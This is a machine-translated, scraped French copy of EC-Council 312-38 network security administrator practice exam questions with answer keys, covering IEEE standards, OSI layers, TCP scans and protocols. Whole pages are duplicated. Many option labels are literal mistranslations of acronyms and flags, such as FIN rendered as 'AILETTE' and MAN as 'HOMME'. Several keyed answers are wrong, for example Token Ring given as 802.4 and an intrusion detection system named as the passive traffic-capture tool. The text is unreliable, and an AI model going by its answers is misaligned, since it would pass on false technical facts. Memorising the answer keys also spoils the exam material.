Vous êtes sur la page 1sur 98

05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité


réseau (ENSA) 1
Lequel des drapeaux suivants est défini lorsqu'un port fermé répond à une analyse d'arbre de Noël?

Les options sont:

RST (correct)

AILETTE

POUSSER

ACK

Réponse: RST

EC0-232 EC-Council E-Commerce Architect Practice Practice Set 3

Token Ring est normalisé par laquelle des normes IEEE suivantes?

Les options sont:

802.4 (correct)

802.2

802.1

802.3

Réponse: 802.4

Lequel des éléments suivants est un réseau haute vitesse qui connecte des ordinateurs, des imprimantes et
d'autres périphériques réseau?

Les options sont:

BLÊME

LAN (correct)

POUVEZ

HOMME

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 1/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité


réseau (ENSA) 1
Lequel des drapeaux suivants est défini lorsqu'un port fermé répond à une analyse d'arbre de Noël?

Les options sont:

RST (correct)

AILETTE

POUSSER

ACK

Réponse: RST

EC0-232 EC-Council E-Commerce Architect Practice Practice Set 3

Token Ring est normalisé par laquelle des normes IEEE suivantes?

Les options sont:

802.4 (correct)

802.2

802.1

802.3

Réponse: 802.4

Lequel des éléments suivants est un réseau haute vitesse qui connecte des ordinateurs, des imprimantes et
d'autres périphériques réseau?

Les options sont:

BLÊME

LAN (correct)

POUVEZ

HOMME

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 1/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Réponse: LAN

Laquelle des options suivantes n'est PAS une méthode d'authentification WEP?

Les options sont:

Authentification du système ouvert

Authentification d'accès aux médias

Authentification Kerberos (correcte)

Authentification par clé partagée

Réponse: authentification Kerberos

EC-Council Certified Security Analyst (ECSA) Examens 2019 Set 13


Laquelle des normes IEEE suivantes définit la topologie en anneau passant par jeton?

Les options sont:

802.4

802.3

802.5 (correct)

802,7

Réponse: 802.5

Laquelle des couches suivantes est la plus proche de l'utilisateur final?

Les options sont:

Couche d'application (correcte)

Couche de présentation

Couche physique

Couche de session

Réponse: couche d'application

John travaille en tant que pirate éthique pour www.company.com Inc. Il souhaite découvrir les ports
ouverts sur le serveur de www.company.com à l'aide d'un scanner de ports. Cependant, il ne souhaite pas
établir une connexion TCP complète. Laquelle des techniques de numérisation suivantes utilisera-t-il pour
accomplir cette tâche?

Les options sont:

TCP SYN / ACK

TCP SYN (correct)

TCP FIN
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 2/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
arbre de Noël

Réponse: TCP SYN

ECCouncil EC1-349 Computer Hack Forensic Investigator Exam Set 2


Quelle est la réponse d'un scan de Noël si un port est ouvert ou filtré?

Les options sont:

RST

AILETTE

POUSSER

Pas de réponse (correct)

Réponse: pas de réponse


Dans lequel des modes de transmission suivants la communication est-elle unidirectionnelle?

Les options sont:

Mode duplex intégral

Mode racine

Mode simplex (correct)

Mode semi-duplex

Réponse: mode simplex

Laquelle des normes IEEE suivantes ajoute des fonctionnalités QoS et une prise en charge multimédia?

Les options sont:

802.11b

802.11a

802,5

802.11e (correct)

Réponse: 802.11e

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 4


Dans un réseau Ethernet poste à poste, lequel des câbles suivants est utilisé pour connecter deux
ordinateurs, à l'aide de connecteurs RJ-45 et d'un câble UTP de catégorie 5?

Les options sont:

Crossover (correct)

Parallèle

Loopback
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 3/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
En série

Réponse: Crossover

Laquelle des normes IEEE suivantes définit une topologie de bus physique?

Les options sont:

802,5

802,6

802.3

802.4 (correct)

Réponse: 802.4

Laquelle des transitions d'état TCP / IP suivantes ne représente aucun état de connexion?

Les options sont:

Fermeture

Fermer-attendre

Fermé (correct)

Fin-attente-1

Réponse: fermé

ECCouncil 312-50 Test de pratique de hacker éthique certifié Set 2


Lequel des éléments suivants est un outil logiciel utilisé dans les attaques passives pour capturer le trafic
réseau?

Les options sont:

Renifleur

Système de prévention des intrusions

Warchalking

Système de détection d'intrusion (correct)

Réponse: Système de détection d'intrusion

Laquelle des normes suivantes est approuvée par IEEE-SA pour les réseaux personnels sans fil?

Les options sont:

802.16

802.15 (correct)

802.1

802.11a
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 4/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Réponse: 802.15

CSMA / CD est spécifié dans laquelle des normes IEEE suivantes?

Les options sont:

802.2

802.1

802.3 (correct)

802.15

Réponse: 802.3

ECCouncil 312-76Disaster Recover Professional Practice Exam Set 2


Lequel des éléments suivants est un protocole de couche réseau utilisé pour obtenir une adresse IP pour une
adresse matérielle (MAC) donnée?

Les options sont:

IP

ARP

PIM

RARP (correct)

Réponse: RARP

Parmi les affirmations suivantes, lesquelles sont VRAIES concernant la zone démilitarisée (DMZ)? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu connecté à un réseau
public comme Internet. (Correct)

Les hôtes de la DMZ ont une connectivité complète avec des hôtes spécifiques du réseau interne.

La zone démilitarisée est un sous-réseau physique ou logique qui contient et expose les services externes d'une
organisation à un plus grand réseau non approuvé. (Correct)

Le but d'une zone démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une
organisation. (Correct)

Réponse: Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu
connecté à un réseau public comme Internet. La zone démilitarisée est un sous-réseau physique ou logique qui contient
et expose les services externes d'une organisation à un plus grand réseau non approuvé. Le but d'une zone
démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une organisation.

Les adresses IP réservées à des fins expérimentales appartiennent à laquelle des classes suivantes?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 5/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Les options sont:

Classe E (correcte)

Classe D

Classe C

Classe A

Réponse: Classe E

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 1


Lequel des éléments suivants est un appareil électronique qui aide à transmettre des paquets de données le
long des réseaux?

Les options sont:

Centre

Routeur (correct)

passerelle

Répétiteur

Réponse: Routeur

Lequel des protocoles suivants est utilisé dans les réseaux sans fil?

Les options sont:

CSMA / CD

ALOHA

CSMA

CSMA / CA (correct)

Réponse: CSMA / CA

Lequel des champs suivants dans l'en-tête IPv6 remplace le champ TTL dans l'en-tête IPv4?

Les options sont:

En-tête suivant

Version

Classe de trafic

Limite de saut (correcte)

Réponse: limite de saut

ECCouncil E-Commerce Architect EC0-232 Practice Exam Set 7

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 6/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Lequel des protocoles suivants est utilisé pour le routage multidiffusion inter-domaines?

Les options sont:

VoIP

RPC

BGP (correct)

RAYON

Réponse: BGP

Laquelle des plages d'adresses suivantes peut être utilisée dans le premier octet d'une adresse réseau de
classe A?

Les options sont:

224-255

0-127 (correct)

128-191

192-223

Réponse: 0-127
Laquelle des couches OSI suivantes est parfois appelée couche de syntaxe?

Les options sont:

Couche de liaison de données

Couche d'application

Couche de présentation (correcte)

Couche physique

Réponse: couche de présentation

ECCouncil 712-50 CISO Certified (CISO) Practice Exam Set 1

Lequel des outils suivants est un analyseur de protocole open source qui peut capturer le trafic en temps
réel?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 7/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Les options sont:

Renifler

Netresident

NetWitness

Wireshark (correct)

Réponse: Wireshark

Laquelle des couches OSI suivantes formate et chiffre les données à envoyer sur le réseau?

Les options sont:

Couche physique

Couche de présentation (correcte)

Couche réseau

Couche de transport

Réponse: couche de présentation


Laquelle des couches suivantes assure la gestion des sessions de communication entre les ordinateurs hôtes?

Les options sont:

Couche de lien

Couche d'application

Couche Internet

Couche de transport (correcte)

Réponse: couche de transport

ECCouncil 712-50 Kit d'examen pratique certifié CISO (CCISO) 10


Laquelle des organisations suivantes est une organisation mondiale qui vise à établir, affiner et promouvoir
les normes de sécurité Internet?

Les options sont:

IEEE

ANSI

WASC (correct)

UIT

Réponse: WASC
Laquelle des couches suivantes du modèle OSI fournit l'adressage physique?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 8/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Les options sont:

Couche de liaison de données (correcte)

Couche d'application

Couche physique

Couche réseau

Réponse: couche de liaison de données

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 9/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

ECCouncil 312-38 Ensemble d'examen d'administrateur de


sécurité réseau (ENSA) 2
Vous travaillez en tant qu'analyseur de sécurité réseau. Vous avez reçu un e-mail suspect en
travaillant sur un projet médico-légal. Maintenant, vous voulez connaître l'adresse IP de
l'expéditeur afin d'analyser diverses informations telles que l'emplacement réel, les
informations de domaine, le système d'exploitation utilisé, les coordonnées, etc. de l'expéditeur
de l'e-mail à l'aide de divers outils et ressources . Vous souhaitez également vérifier si cet e-
mail est faux ou réel. Vous savez que l'analyse des en-têtes de courrier électronique est un bon
point de départ dans de tels cas. L'en-tête de l'e-mail suspect est indiqué ci-dessous: Quelle est
l'adresse IP de l'expéditeur de cet e-mail?

Les options sont:

209.191.91.180

172.16.10.90

141.1.1.1

216.168.54.25 (correct)

Réponse: 216.168.54.25

ECCouncil EC1-349 Computer Hack Forensic Investigator Exam Set 3


Laquelle des pratiques suivantes consiste à envoyer des e-mails indésirables, souvent avec un
contenu commercial, en grande quantité à un ensemble de destinataires aveugles? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Brouillage des e-mails

Usurpation d'adresse e-mail

Courrier indésirable (correct)

Spam par e-mail (correct)

Réponse: Courrier indésirable Courriel indésirable

Lequel des systèmes suivants surveille le système d'exploitation en détectant une activité
inappropriée, en écrivant dans des fichiers journaux et en déclenchant des alarmes?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 1/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Les options sont:

Système d'identification basé sur les signatures

Système d'identification basé sur l'hôte (correct)

Système d'identification basé sur le réseau

Système d'identification basé sur le comportement

Réponse: système d'identification basé sur l'hôte

Lequel des éléments suivants est un exemple de réseau fournissant des méthodes d'accès
DQDB?

Les options sont:

IEEE 802.2

IEEE 802.4

IEEE 802.3

IEEE 802.6 (correct)

Réponse: IEEE 802.6

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Practice Set 5


Lequel des outils d'analyse réseau suivants est un analyseur de port TCP / UDP qui fonctionne
comme un balayeur de ping et un résolveur de nom d'hôte?

Les options sont:

Hping

Netstat

SuperScan (correct)

Nmap

Réponse: SuperScan

Lequel des éléments suivants est un mécanisme de contrôle de congestion conçu pour les flux
de monodiffusion fonctionnant dans un environnement Internet et concurrençant le trafic
TCP?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 2/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Les options sont:

Fenêtre coulissante

Augmentation additive / diminution multiplicative

Reconnaissance sélective

Contrôle de débit amical TCP (correct)

Réponse: TCP Friendly Rate Control

Lequel des protocoles suivants est une méthode pour implémenter des réseaux privés virtuels?

Les options sont:

PPTP (correct)

TLS

SNMP

SSL

Réponse: PPTP

ECCouncil 312-49v8 Computer Hacking Investigator Exam Set 3


Lequel des éléments suivants est un produit Cisco qui exécute des fonctions VPN et pare-feu?

Les options sont:

Pare-feu PIX (correct)

Passerelle au niveau du circuit

Pare-feu de filtrage de paquets IP

Pare-feu au niveau de l'application

Réponse: Pare-feu PIX

Dans lequel des modes de transmission suivants les données sont-elles envoyées et reçues
alternativement?

Les options sont:

Mode pont

Mode semi-duplex (correct)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 3/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Mode duplex intégral

Mode simplex

Réponse: mode semi-duplex

Laquelle des couches OSI suivantes définit les spécifications électriques et physiques des
appareils?

Les options sont:

Couche de transport

Couche de présentation

Couche de liaison de données

Couche physique (correcte)

Réponse: couche physique

ECCouncil EC1-349 Computer Hack Forensic Investigator Exam Set 5


Laquelle des organisations suivantes est une organisation mondiale qui vise à établir, affiner et
promouvoir les normes de sécurité Internet?

Les options sont:

UIT

ANSI

WASC (correct)

IEEE

Réponse: WASC

Quelle est la portée des ports bien connus?

Les options sont:

Au-dessus de 65535

0 à 1023 (correct)

49152 à 65535

1024 à 49151

Réponse: 0 à 1023

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 4/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Parmi les outils suivants, lesquels ne sont PAS utilisés pour consigner les activités réseau dans
le système d'exploitation Linux? Chaque bonne réponse représente une solution
complète. Choisissez tout ce qui correspond.

Les options sont:

Timbersee

Swatch

PsGetSid (correct)

PsLoggedOn (correct)

Réponse: PsGetSid PsLoggedOn

EC0-232 EC-Council ec0-232 E-Commerce Architect Exam Set 3


Laquelle des plages d'adresses suivantes peut être utilisée dans le premier octet d'une adresse
réseau de classe B?

Les options sont:

128-191 (correct)

0-127

224-255

192-223

Réponse: 128-191

Laquelle des fonctionnalités clés suivantes limite le taux de transfert des données par un
expéditeur pour garantir une livraison fiable?

Les options sont:

Transfert de données sans erreur

Contrôle de flux (correct)

Contrôle de la congestion

Transfert de données commandé

Réponse: Contrôle de flux

Combien de couches sont présentes dans le modèle de couche OSI?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 5/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Les options sont:

7 (correct)

Réponse: 7

EC-Council Certified Security Analyst (ECSA) Examens 2019 Set 16


Lequel des éléments suivants aide à bloquer tout le trafic entrant et / ou sortant non autorisé?

Les options sont:

Pare-feu (correct)

IDS

IPS

Renifleur

Réponse: pare - feu

Lequel des protocoles suivants est utilisé pour le routage des conversations vocales sur
Internet?

Les options sont:

DHCP

DNS

IP

VoIP (correct)

Réponse: VoIP

Lequel des protocoles suivants prend en charge la multidiffusion spécifique à la source


(SSM)?

Les options sont:

DHCP

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 6/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

DNS

ARP

BGMP (correct)

Réponse: BGMP

EC0-349 ECCouncil Computer Hacking Forensic Investigator Set 2


Lequel des protocoles suivants envoie un signal de bourrage lorsqu'une collision est détectée?

Les options sont:

CSMA / CD (correct)

CSMA

ALOHA

CSMA / CA

Réponse: CSMA / CD

Laquelle des normes IEEE suivantes définit la méthode d'accès prioritaire à la demande?

Les options sont:

802.3

802.15

802.12 (correct)

802.11

Réponse: 802.12

Lequel des types de câbles coaxiaux suivants est utilisé pour la télévision par câble et les
modems câble?

Les options sont:

RG-58

RG-8

RG-62

RG-59 (correct)

Réponse: RG-59

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 7/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Réponse: LAN

Laquelle des options suivantes n'est PAS une méthode d'authentification WEP?

Les options sont:

Authentification du système ouvert

Authentification d'accès aux médias

Authentification Kerberos (correcte)

Authentification par clé partagée

Réponse: authentification Kerberos

EC-Council Certified Security Analyst (ECSA) Examens 2019 Set 13


Laquelle des normes IEEE suivantes définit la topologie en anneau passant par jeton?

Les options sont:

802.4

802.3

802.5 (correct)

802,7

Réponse: 802.5

Laquelle des couches suivantes est la plus proche de l'utilisateur final?

Les options sont:

Couche d'application (correcte)

Couche de présentation

Couche physique

Couche de session

Réponse: couche d'application

John travaille en tant que pirate éthique pour www.company.com Inc. Il souhaite découvrir les ports
ouverts sur le serveur de www.company.com à l'aide d'un scanner de ports. Cependant, il ne souhaite pas
établir une connexion TCP complète. Laquelle des techniques de numérisation suivantes utilisera-t-il pour
accomplir cette tâche?

Les options sont:

TCP SYN / ACK

TCP SYN (correct)

TCP FIN
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 2/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
arbre de Noël

Réponse: TCP SYN

ECCouncil EC1-349 Computer Hack Forensic Investigator Exam Set 2


Quelle est la réponse d'un scan de Noël si un port est ouvert ou filtré?

Les options sont:

RST

AILETTE

POUSSER

Pas de réponse (correct)

Réponse: pas de réponse


Dans lequel des modes de transmission suivants la communication est-elle unidirectionnelle?

Les options sont:

Mode duplex intégral

Mode racine

Mode simplex (correct)

Mode semi-duplex

Réponse: mode simplex

Laquelle des normes IEEE suivantes ajoute des fonctionnalités QoS et une prise en charge multimédia?

Les options sont:

802.11b

802.11a

802,5

802.11e (correct)

Réponse: 802.11e

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 4


Dans un réseau Ethernet poste à poste, lequel des câbles suivants est utilisé pour connecter deux
ordinateurs, à l'aide de connecteurs RJ-45 et d'un câble UTP de catégorie 5?

Les options sont:

Crossover (correct)

Parallèle

Loopback
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 3/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
En série

Réponse: Crossover

Laquelle des normes IEEE suivantes définit une topologie de bus physique?

Les options sont:

802,5

802,6

802.3

802.4 (correct)

Réponse: 802.4

Laquelle des transitions d'état TCP / IP suivantes ne représente aucun état de connexion?

Les options sont:

Fermeture

Fermer-attendre

Fermé (correct)

Fin-attente-1

Réponse: fermé

ECCouncil 312-50 Test de pratique de hacker éthique certifié Set 2


Lequel des éléments suivants est un outil logiciel utilisé dans les attaques passives pour capturer le trafic
réseau?

Les options sont:

Renifleur

Système de prévention des intrusions

Warchalking

Système de détection d'intrusion (correct)

Réponse: Système de détection d'intrusion

Laquelle des normes suivantes est approuvée par IEEE-SA pour les réseaux personnels sans fil?

Les options sont:

802.16

802.15 (correct)

802.1

802.11a
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 4/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Réponse: 802.15

CSMA / CD est spécifié dans laquelle des normes IEEE suivantes?

Les options sont:

802.2

802.1

802.3 (correct)

802.15

Réponse: 802.3

ECCouncil 312-76Disaster Recover Professional Practice Exam Set 2


Lequel des éléments suivants est un protocole de couche réseau utilisé pour obtenir une adresse IP pour une
adresse matérielle (MAC) donnée?

Les options sont:

IP

ARP

PIM

RARP (correct)

Réponse: RARP

Parmi les affirmations suivantes, lesquelles sont VRAIES concernant la zone démilitarisée (DMZ)? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu connecté à un réseau
public comme Internet. (Correct)

Les hôtes de la DMZ ont une connectivité complète avec des hôtes spécifiques du réseau interne.

La zone démilitarisée est un sous-réseau physique ou logique qui contient et expose les services externes d'une
organisation à un plus grand réseau non approuvé. (Correct)

Le but d'une zone démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une
organisation. (Correct)

Réponse: Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu
connecté à un réseau public comme Internet. La zone démilitarisée est un sous-réseau physique ou logique qui contient
et expose les services externes d'une organisation à un plus grand réseau non approuvé. Le but d'une zone
démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une organisation.

Les adresses IP réservées à des fins expérimentales appartiennent à laquelle des classes suivantes?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 5/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Les options sont:

Classe E (correcte)

Classe D

Classe C

Classe A

Réponse: Classe E

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 1


Lequel des éléments suivants est un appareil électronique qui aide à transmettre des paquets de données le
long des réseaux?

Les options sont:

Centre

Routeur (correct)

passerelle

Répétiteur

Réponse: Routeur

Lequel des protocoles suivants est utilisé dans les réseaux sans fil?

Les options sont:

CSMA / CD

ALOHA

CSMA

CSMA / CA (correct)

Réponse: CSMA / CA

Lequel des champs suivants dans l'en-tête IPv6 remplace le champ TTL dans l'en-tête IPv4?

Les options sont:

En-tête suivant

Version

Classe de trafic

Limite de saut (correcte)

Réponse: limite de saut

ECCouncil E-Commerce Architect EC0-232 Practice Exam Set 7

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 6/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Lequel des protocoles suivants est utilisé pour le routage multidiffusion inter-domaines?

Les options sont:

VoIP

RPC

BGP (correct)

RAYON

Réponse: BGP

Laquelle des plages d'adresses suivantes peut être utilisée dans le premier octet d'une adresse réseau de
classe A?

Les options sont:

224-255

0-127 (correct)

128-191

192-223

Réponse: 0-127
Laquelle des couches OSI suivantes est parfois appelée couche de syntaxe?

Les options sont:

Couche de liaison de données

Couche d'application

Couche de présentation (correcte)

Couche physique

Réponse: couche de présentation

ECCouncil 712-50 CISO Certified (CISO) Practice Exam Set 1

Lequel des outils suivants est un analyseur de protocole open source qui peut capturer le trafic en temps
réel?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 7/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Les options sont:

Renifler

Netresident

NetWitness

Wireshark (correct)

Réponse: Wireshark

Laquelle des couches OSI suivantes formate et chiffre les données à envoyer sur le réseau?

Les options sont:

Couche physique

Couche de présentation (correcte)

Couche réseau

Couche de transport

Réponse: couche de présentation


Laquelle des couches suivantes assure la gestion des sessions de communication entre les ordinateurs hôtes?

Les options sont:

Couche de lien

Couche d'application

Couche Internet

Couche de transport (correcte)

Réponse: couche de transport

ECCouncil 712-50 Kit d'examen pratique certifié CISO (CCISO) 10


Laquelle des organisations suivantes est une organisation mondiale qui vise à établir, affiner et promouvoir
les normes de sécurité Internet?

Les options sont:

IEEE

ANSI

WASC (correct)

UIT

Réponse: WASC
Laquelle des couches suivantes du modèle OSI fournit l'adressage physique?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 8/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Les options sont:

Couche de liaison de données (correcte)

Couche d'application

Couche physique

Couche réseau

Réponse: couche de liaison de données

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 9/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

ECCouncil 312-38 Ensemble d'examen d'administrateur de


sécurité réseau (ENSA) 2
Vous travaillez en tant qu'analyseur de sécurité réseau. Vous avez reçu un e-mail suspect en
travaillant sur un projet médico-légal. Maintenant, vous voulez connaître l'adresse IP de
l'expéditeur afin d'analyser diverses informations telles que l'emplacement réel, les
informations de domaine, le système d'exploitation utilisé, les coordonnées, etc. de l'expéditeur
de l'e-mail à l'aide de divers outils et ressources . Vous souhaitez également vérifier si cet e-
mail est faux ou réel. Vous savez que l'analyse des en-têtes de courrier électronique est un bon
point de départ dans de tels cas. L'en-tête de l'e-mail suspect est indiqué ci-dessous: Quelle est
l'adresse IP de l'expéditeur de cet e-mail?

Les options sont:

209.191.91.180

172.16.10.90

141.1.1.1

216.168.54.25 (correct)

Réponse: 216.168.54.25

ECCouncil EC1-349 Computer Hack Forensic Investigator Exam Set 3


Laquelle des pratiques suivantes consiste à envoyer des e-mails indésirables, souvent avec un
contenu commercial, en grande quantité à un ensemble de destinataires aveugles? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Brouillage des e-mails

Usurpation d'adresse e-mail

Courrier indésirable (correct)

Spam par e-mail (correct)

Réponse: Courrier indésirable Courriel indésirable

Lequel des systèmes suivants surveille le système d'exploitation en détectant une activité
inappropriée, en écrivant dans des fichiers journaux et en déclenchant des alarmes?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 1/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Les options sont:

Système d'identification basé sur les signatures

Système d'identification basé sur l'hôte (correct)

Système d'identification basé sur le réseau

Système d'identification basé sur le comportement

Réponse: système d'identification basé sur l'hôte

Lequel des éléments suivants est un exemple de réseau fournissant des méthodes d'accès
DQDB?

Les options sont:

IEEE 802.2

IEEE 802.4

IEEE 802.3

IEEE 802.6 (correct)

Réponse: IEEE 802.6

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Practice Set 5


Lequel des outils d'analyse réseau suivants est un analyseur de port TCP / UDP qui fonctionne
comme un balayeur de ping et un résolveur de nom d'hôte?

Les options sont:

Hping

Netstat

SuperScan (correct)

Nmap

Réponse: SuperScan

Lequel des éléments suivants est un mécanisme de contrôle de congestion conçu pour les flux
de monodiffusion fonctionnant dans un environnement Internet et concurrençant le trafic
TCP?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 2/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Les options sont:

Fenêtre coulissante

Augmentation additive / diminution multiplicative

Reconnaissance sélective

Contrôle de débit amical TCP (correct)

Réponse: TCP Friendly Rate Control

Lequel des protocoles suivants est une méthode pour implémenter des réseaux privés virtuels?

Les options sont:

PPTP (correct)

TLS

SNMP

SSL

Réponse: PPTP

ECCouncil 312-49v8 Computer Hacking Investigator Exam Set 3


Lequel des éléments suivants est un produit Cisco qui exécute des fonctions VPN et pare-feu?

Les options sont:

Pare-feu PIX (correct)

Passerelle au niveau du circuit

Pare-feu de filtrage de paquets IP

Pare-feu au niveau de l'application

Réponse: Pare-feu PIX

Dans lequel des modes de transmission suivants les données sont-elles envoyées et reçues
alternativement?

Les options sont:

Mode pont

Mode semi-duplex (correct)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 3/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Mode duplex intégral

Mode simplex

Réponse: mode semi-duplex

Laquelle des couches OSI suivantes définit les spécifications électriques et physiques des
appareils?

Les options sont:

Couche de transport

Couche de présentation

Couche de liaison de données

Couche physique (correcte)

Réponse: couche physique

ECCouncil EC1-349 Computer Hack Forensic Investigator Exam Set 5


Laquelle des organisations suivantes est une organisation mondiale qui vise à établir, affiner et
promouvoir les normes de sécurité Internet?

Les options sont:

UIT

ANSI

WASC (correct)

IEEE

Réponse: WASC

Quelle est la portée des ports bien connus?

Les options sont:

Au-dessus de 65535

0 à 1023 (correct)

49152 à 65535

1024 à 49151

Réponse: 0 à 1023

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 4/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Parmi les outils suivants, lesquels ne sont PAS utilisés pour consigner les activités réseau dans
le système d'exploitation Linux? Chaque bonne réponse représente une solution
complète. Choisissez tout ce qui correspond.

Les options sont:

Timbersee

Swatch

PsGetSid (correct)

PsLoggedOn (correct)

Réponse: PsGetSid PsLoggedOn

EC0-232 EC-Council ec0-232 E-Commerce Architect Exam Set 3


Laquelle des plages d'adresses suivantes peut être utilisée dans le premier octet d'une adresse
réseau de classe B?

Les options sont:

128-191 (correct)

0-127

224-255

192-223

Réponse: 128-191

Laquelle des fonctionnalités clés suivantes limite le taux de transfert des données par un
expéditeur pour garantir une livraison fiable?

Les options sont:

Transfert de données sans erreur

Contrôle de flux (correct)

Contrôle de la congestion

Transfert de données commandé

Réponse: Contrôle de flux

Combien de couches sont présentes dans le modèle de couche OSI?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 5/7
